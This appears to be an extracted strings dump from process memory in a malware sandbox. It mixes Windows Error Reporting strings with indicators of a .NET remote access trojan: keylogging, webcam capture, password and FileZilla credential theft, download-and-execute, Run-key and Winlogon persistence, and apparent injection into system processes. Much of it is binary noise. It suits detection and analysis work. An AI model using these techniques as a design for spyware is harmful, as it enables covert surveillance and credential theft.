%d.%d.%d.%d.x.%d.%d
shfolder.dll
unknown.sig
%s dw20.exe %d.%d.%d.%d
RegKey=
ResponseURL=
URLLaunch=
NoExternalURL=
%s:(%s) XX
%s:(%s) X
%s:(%s)
%s:(%s) %s
registry.txt
wql.txt
Windows NT Version %d.%d Build: %d
Stage 1 server response: %s
Stage 2 server response: %s
Stage 4 server response: %s
StatusCode: %d
Opening server: %s
HttpOpen failed.
Opening %s Request:
HTTPS
HttpSend Failed.
HttpWrite Failed, GLE=%d.
HttpEndReq failed.
Count filename length greater than MAX_PATH, can't report.
Filesystem reporting: count file updated
FReportToQueue: GetLastError=%u
FReportToQueue: File Tree Root does not exist: %S
Failed to add heap file to cab: %S
memory.dmp
mdmpmem.hdmp
version.txt
Network reporting complete.
Network reporting failed.
Application Error Reporting Transfer %d
Filesystem reporting complete
Filesystem reporting: cab successfully written
Filesystem reporting: could not find/create directory for cab/count
Filesystem reporting: redirection failure, too many redirects
Filesystem reporting: redirection failure, no previous roots
Filesystem reporting: improper file tree root
Filesystem reporting cancelled
Filesystem reporting: file tree root is too long
Record: 0xxx
Address: 0xxx
Code: 0xx
Flags: 0xx
x:x
(%d.%d:%d.%d)
Checksum: 0xx
Time Stamp: 0xx
Image Base: 0xx
Image Size: 0xx
Module %d
Windows NT %d.%d Build: %d
CPU AMD Feature Code: X
CPU Version: X CPU Feature Code: X
CPU Vendor Code: X - X - X
0xx:
0xx: x x x x
EFlags: 0xx ESP: 0xx SegSs: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EDI: 0xx ESI: 0xx EAX: 0xx
Thread ID: 0xx
Thread %d
Memory Range %d
Software\Microsoft\PCHealth\ErrorReporting\DW
OkToReportFromTheseQueues
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to obtain queue mutex. GetLastError=%u
FGetQueueMutex: WaitForSingleObject returned %u
Failed to open or create queue mutex. GetLastError=%u
Failed queued reporting pester check
Failed to create run reg key
Persistent run key is set.
CoInitializeEx() returned 0x%x.
Reporting to Admin Queue
Reporting to Regular Queue
Reporting to SignOff Queue
Reporting to Headless Queue
Reporting from Regular Queue
Reporting from SignOff Queue
Reporting from Headless Queue
OOM Failed to alloc QueuedReportData
FAllocSD: GetLastError=%u
%s%s%s
FEnsureQueueDirW: GetLastError=%u
Failed to write snt. GLE: %u
Failed to create snt. GLE: %u
Failed to set info; bad queue type: %u
Failed to open reg key for queue
Failed to get windows folder path for queue: %u
Failed to move instr file from queue A to queue B - %u
Failed to move cab file from queue A to queue B - %u
Did not move any reports from admin q to user q
Did not move any reports from user q to headless q
Queue types that have reports: %u
Setting triggerAtConnectionMade to: %u
Setting triggerAtLogon to: %u
Setting the queue trigger based upon: %u
SUCCESS adding report to queue
Launched (%S)
Failed to store the SensSubscription. hr: %d
failed to allocate PROGID string: %S
Failed putting SubscriberInterface. hr: %d
Failed putting PerUser. hr: %d
Failed putting Enabled. hr: %d
Failed putting MachineName. hr: %d
Failed putting OwnerSID. hr: %d
Failed putting Description. hr: %d
Failed putting InterfaceID. hr: %d
Failed putting EventClassID. hr: %d
Failed putting MethodName. hr: %d
Failed putting SubscriptionName. hr: %d
Failed putting PublisherID. hr: %d
Failed putting SubscriberCLSID. hr: %d
Failed putting SubscriptionID. hr: %d
Failed CoCreateInstance on EventSubscription. hr: %d
Failed to remove the SensSubscription. hr: %d
failed to allocate query string: %S
Failed CoCreateInstance on EventSystem. hr: %d
SENS: StringFromIID() returned
DWSHARED: SysAllocString(%s) failed!
Failed to subscribe subscription %u. hr: %d
Failed to get data for subscription %u. hr: %d
Failed to query install reg key
Failed to open install reg key
Software\Microsoft\PCHealth\ErrorReporting\DW\Installed
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
initing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
freeing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
0addref CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
QIing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
releasing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
deleting CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
creating CDwAccessible: hwnd %x, idc %d
WriteAtOffset.Write(0x%x) failed, 0xx
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteDirectoryEntry.Write(0x%x) failed, 0xx
Thread(0x%x) callback returned FALSE
WriteSystemInfo.GetOsCsdString failed, 0xx
WriteSystemInfo.GetCpuInfo failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed, retries %d, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
Kernel minidump write failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
Invalid exception record parameter count (0x%x)
Invalid exception record size (0x%x)
Invalid CPU type (0x%x)
Invalid function table size (0x%x)
GetSystemType.GetOsInfo failed, 0xx
GetSystemType.GetCpuType failed, 0xx
Write.Start failed, 0xx
Dump type requires streaming but output provider does not support streaming
Invalid dump type 0x%x
dbghelp.dll
Alloc(0x%x) failed
Thread(0x%x) will not be included
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
0GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
0GenGetAuxMemory(%ws) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.Start(0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
version.dll
ntdll.dll
%$%,%4%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
!"#$%&'()* ,-./0123456789:;
!!!!2222
%%%f||||
!!!!2222||||
!"#$%&'(
'()* ,-./0
&'()* ,-./
&'()* ,-./012345
3456789
.ASex
!"#$%&'()* ,-./012
!"#$%&'()
?msodatad.dat
msodatalast.dat
Unicows.dll
Kernel32.dll
SHLWAPI.DLL
GDI32.DLL
wintrust.dll
1108160
0u.hN
0SSh
t.WWWj
PSSh07
t5SSh(
PSSSSSSh
0SSSSh
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.dll
OLEACC.dll
OLEAUT32.dll
MSVCRT.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
VERSION.dll
WININET.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ReportEventA
ReportEventW
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyW
GetProcessHeap
GetSystemWindowsDirectoryW
_amsg_exit
_acmdln
ShellExecuteExA
UrlGetPartA
CreateURLMoniker
CreateDialogIndirectParamA
EnumWindows
HttpQueryInfoA
HttpSendRequestExA
HttpOpenRequestA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpEndRequestA
dw20.pdb
\devsplab1\otools\BBT_TEMP\DW20O.pdb
winword.exe
wwordlt.exe
excel.exe
excellt.exe
mspub.exe
frontpg.exe
outlook.exe
powerpnt.exe
powpntlt.exe
onenote.exe
infopath.exe
winproj.exe
ois.exe
visio.exe
`!`'`)` `
e%f-f|3 f'f/f
]!^"^#^ ^$^
t.uGuHu
x4x7x%x-x x
h&h(h.hMh:h%h h,k/k-k1k4kmk
k%lzmcmdmvm
^Q]Q~NzP}P\PGPCPLPZPIPePvPNPUPuPtPwPOP
]8^6^3^7^
ichczc]eVeQeYeWe_UOeXeUeTe
{1{ {-{/{2{8{
r6s%s4s)s:t*t3t"t%t5t6t4t/t
t&t(t%u&ukuju
WHX%X
`IaJa aEa6a2a.aFa/aOa)a@a bh
d@d%d'd
duewexei
kCpDpJpHpIpEpFp
S$S%S&S'S(S)S S,S.S2S3S5S6S8S:S;SBSFSKSNSOSPSUSVSXSYS[S]S_SbSdSeSgShSiSjSkSmStSvSzS}S~S
U U!U"U#U$U%U(U)U U:U=U?UBUGUIULUSUTUXUYUZU[U]U`UgUhUiUkUlUmUnUoUpUqUrUsUtUxUyUzU
c c!c"c#c$c%c&c'c.c0c1c5c7c?cRcSc[c\c]c^c_c`cacbcccdcfcjclcsctcyc~c
m!m#m$m&mCmDmEmFmGmHmImJmKmLmMmNmOmPmQmRmSmTmUmVmWm[m\m]mkmqmrmsm
nRsSsh
evg%f
m.tRa
gtr%x
Q%SKg
f.ebp>QI
y.yxT
fn:q%uN
aw.Toiz
RMeXe
S#S$S%S;ScSdSrSsStSuS
`!`"`&`'`)`*` `,`-`.`/`0`2`3`4`5`6`:`=`>`?`
^ ^!^"^#^$^%^&^'^.^}^
c c!c"c#c$c%c&c'c*c7c:c;cSc[c1e?e@eAeBeCeDeEe
f f!f"f#f$f%f&f'f(f)f*f f,f-f
m m!m"m#m$m%m&m'm(m)m*m m,m-m.m1m2m3m4m5m6m7m8m9m:m;mm?m@mBmCmDmGmHmImJmKmLmMmNmOmPmQmRmSmTmUm
u u-u.uFuGuHuIuJuKuLuMuNuOuPuQuRuSu
U U!U"U#U$U%U&U'U(U4UJU
](^)^*^ ^,^-^/^0^1^
m/mAmFmVmWmXmYmZm[m\m]m^m_m`mambmcmdmemfmgmhmimjmkmlmmmnmompmqmrmsmtmumvmwmxmymzm{m|m}m~m
x x!x"x#x$x%x'x(x)x*x x,x.x/x0x1x2x3x4x5x6x7x8x9x:x;xx?x@xAxXy_yaycydyeygyiyjykylynyoy
} }!}"}#}$}%}&}'}
] ]!]"]#]$]%]&]'](])]*] ],]-].]/]0]
]2^3^4^5^6^7^8^9^:^;^^
cMeNeOePeQeReSeTeUeWeXeYeZe[e]ebe
X X!X"X#X$X%X&X'X(X)X*X X,X-X.X/X0X1X3X4X6X7X8X9X:X;XX?X@XAXBXCXDXEXFXGXHXJXTX_X`XfXmX
d%d-d0d=dRdad2e\e^e_e`eaecedeeefegeheiejele
s"s#s$s%s&s(s)s,s-s/s0s1s2s3s4s5s6s8s9s>s@sGs
u$u%u&u/ujukulumunuouqurusutu
duewexeyeze{e
~ ~!~"~#~$~%~&~'~(~*~ ~-~8~:~0
| |!|"|#|$|%|&|(|)|*|-|.|/|0|1|2|6|
{3~3}3|3
eZl%u
Q.YeY
R:\Sg|p5rL
e$e#e e4e5e7e6e8eKuHeVeUeMeXe^e]erexei
s4s/s)s%s>sNsOs
s&t*t)t.tbt
2%2.bx
{ | }9},
d6exe9j
]%sOu4](n
m.t.zB}
w%xIyWy
^vcÓv
%f?iCt
U>_.lE
f.ebp
.nrR=
{fn:q%uN
cgjrsnhu.exe
name="Microsoft.Windows.ErrorReporter"
version="5.1.0.0"
publicKeyToken="6595b64144ccf1df" />
Windows Error Reporting
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
1%s\%s\%s\%s\%s\%s\%s\%s
AppName: %s AppVer: %s AppStamp:%s
ModName: %s ModVer: %s ModStamp:%s
fDebug: %s Offset: %s
Main_AlwaysReportBtn=
Main_NoReportBtn=
Main_ReportBtn=
General_Reportee=
CheckBoxRegKey=
ReportingFlags=
Stage1URL=
Stage2URL=
%General_Reportee%
%u %s
%u.%u %s
%s %s %s %s in %s %s %s fDebug %s at offset %s
Bucket: d
BucketTable %d
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s %s
\dw.log
policy.txt
crash.log
status.txt
hits.log
count.txt
%s\%s\%s
%s\%s\%s\%s
eDWQueuedReporting
DWPersistentQueuedReporting
"%s\%s" -%c
dwtrig20.exe
ReportSize=
\*.cab
dwq.snt
"%s" -%c %u
SEventSystem.EventSubscription
SubscriptionID=%s
#$%&%&'(
Comctl32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\DAA5A.dmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
.NET Runtime 2.0 Error Reporting
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dw.log
Microsoft Application Error Reporting
11.0.8160
Windows
DW20.Exe
system.exe_2448_rwx_00400000_0003E000:
.text
`.rsrc
@.reloc
%fZ_.
.Dr*1
pEXE
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
>z.Js
G^.ug
T0OR[.MP
xD9_.CU
Gjf%d
B.Zh#
.wSL{c
v2.0.50727
System.Threading
Microsoft.VisualBasic
Operators
Microsoft.VisualBasic.CompilerServices
System.Net.Sockets
System.Diagnostics
System.Text
WebClient
System.Net
System.IO
WebHeaderCollection
System.ComponentModel
System.Collections.Generic
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.MyServices
TcpClient
System.Drawing
System.Windows.Forms
SendKeys
System.Drawing.Drawing2D
CopyPixelOperation
System.Security.Cryptography
System.Drawing.Imaging
System.IO.Compression
AForge.Video.DirectShow
AForge.Video
System.Collections
System.Runtime.CompilerServices
System.Reflection
System.Runtime.InteropServices
Keyboard
Keys
System.Security
System.Security.AccessControl
System.Security.Principal
System.Resources
Microsoft.VisualBasic.ApplicationServices
InvalidOperationException
System.Configuration
System.Collections.ObjectModel
Microsoft.VisualBasic.FileIO
System.Timers
Microsoft.Win32
System.Management
RegistryKey
WebBrowser
System.Net.NetworkInformation
WindowsIdentity
WindowsPrincipal
WindowsBuiltInRole
System.Text.RegularExpressions
PortableExecutable
JLibrary.PortableExecutable
System.Globalization
.ctor
GetExecutingAssembly
get_Keyboard
get_ShiftKeyDown
get_Port
ContainsKey
get_ExecutablePath
set_UseShellExecute
OpenSubKey
CreateSubKey
set_Key
b.Rummage.exe
winmm.dll
user32.dll
GetKeyboardState
MapVirtualKey
SetWindowsHookEx
User32.dll
UnhookWindowsHookEx
GetKeyboardLayout
kernel32.dll
ntdll.dll
advapi32.dll
.cctor
Srclient.dll
registryKey_0
wintrust.dll
SetThreadExecutionState
RegOpenKeyEx
tb.resources
ub.resources
b.Resources.resources
System.Windows.Forms.Form
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
$3a574e5b-bd2e-4e23-a175-583f6c78f50f
0.0.0.0
_CorExeMain
mscoree.dll
$#%#'#(#)#*# #,#-#107686;:>=
HTTP POST
hXXp://
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/
HTTP TIMEOUT
HTTP GET
HEAD / HTTP/1.1
POST / HTTP/1.1
GET / HTTP/1.1
Downloaded and Executed File At:
HTTPControl
C:\windows\system32\drivers\etc\hosts
PASSWORDS*
Starting Remote Webcam
WEBCAM*
Error Starting Remote Webcam:
.log.txt
21e4ae94-fc15-47ca-aae4-f06ec0e0544dec7443df-8698-4
b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
httpget
134f35e1-1a49-4c15-8a65-b6db57c3d3dcf2
posthttp
Cannot Get Saved Keylogs:
Cannot Read Saved Keylog:
cmd.exe
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
1314591
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
CMDOn
CMDOff
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
DisableCMD
SAPI.Spvoice
explorer.exe
csrss.exe
\\.\root\default
\uTorrent\uTorrent.exe
\qBittorrent\qbittorrent.exe
\BitTorrent\bittorrent.exe
\BitTorrent\BitTorrent.exe
\Vuze\Azureus.exe
software\Microsoft\Windows\CurrentVersion\Run
software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce\
Software\Microsoft\Windows\CurrentVersion\Run\
{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Specify a Password
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
*Windows 8
Windows 10
*Windows Vista
Windows 8
*Windows XP
Windows 7
*Windows 10
*Windows 7
*Windows Server
Windows
*Windows
KEYLOGS*
WEBCAM
PASSWORDS
RESETPASSWORD
9454f305-8ee5-4fb2-aea3-b9ae9f1a985de3de48a9-d6e2-455d-8490-4d4d6a0a8e8147b7c1ef-394e-
Invalid Webcam Driver Download URL, or Failed to Download File!
Cannot Load Webcam Driver:
Opened Website:
InternetExplorer.Application
hXXp://cachefly.cachefly.net/5mb.test
Win32_Processor.deviceid="CPU0"
ms.ini
Invalid Password Recovery Download URL, or Failed to Download File!
Cannot Recover Passwords. Error:
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SELECT * FROM Win32_OperatingSystem
\FileZilla\recentservers.xml
(. ?)\s . \s . \s . \s (. ?)\s (. ?)
Password
Cannot Obtain Passwords:
vbc.exe
csc.exe
AppLaunch.exe
Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
explorer.exe,"
\clientsvr.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
userinit.exe,"
clientsvr.exe
:Zone.Identifier
b.Resources
system.exe_2448_rwx_009CD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%Documents and Settings%\%current user%\Local Settings\Temp\system.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
cgjrsnhu.exe_2480_rwx_0093D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
DW20.EXE_2548_rwx_00ADD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
ping.exe_3908:
.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
iphlpapi.dll
USER32.dll
WS2_32.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
ping.pdb
RegCloseKey
RegOpenKeyExA
TCP/IP Ping Command
5.1.2600.5512 (xpsp.080413-0852)
ping.exe
Windows
Operating System
5.1.2600.5512
Destination port unreachable.
Unable to initialize Windows Sockets interface, error code %1!d!.
%1 [%2] %0
%1 [%2] : %0
svchost.exe_3856_rwx_012FD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
D:\375569\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
ping.exe_3908_rwx_0084D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\ping.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
wmiprvse.exe_228_rwx_00DDD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\wbem\wmiprvse.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
wmiprvse.exe_228_rwx_00DFD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\wbem\wmiprvse.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
Explorer.EXE_532_rwx_00EDD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%WinDir%\Explorer.EXE
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
Explorer.EXE_532_rwx_01E0D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%WinDir%\Explorer.EXE
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
services.exe_724_rwx_0004D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\services.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
services.exe_724_rwx_00BED000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\services.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_904_rwx_0093D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_904_rwx_00EDD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_988_rwx_009BD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_988_rwx_00B4D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_1084_rwx_0105D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%WinDir%\System32\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_1084_rwx_053BD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%WinDir%\System32\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_1128_rwx_007ED000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_1128_rwx_0086D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_1180_rwx_00CBD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
svchost.exe_1180_rwx_00CDD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\svchost.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
spoolsv.exe_1424_rwx_00B6D000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\spoolsv.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
spoolsv.exe_1424_rwx_00FDD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%System%\spoolsv.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
jqs.exe_1640_rwx_010BD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%Program Files%\Java\jre6\bin\jqs.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
jqs.exe_1640_rwx_010DD000_00007000:
GetProcessWindowStation
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
ntdll.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
%Program Files%\Java\jre6\bin\jqs.exe
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL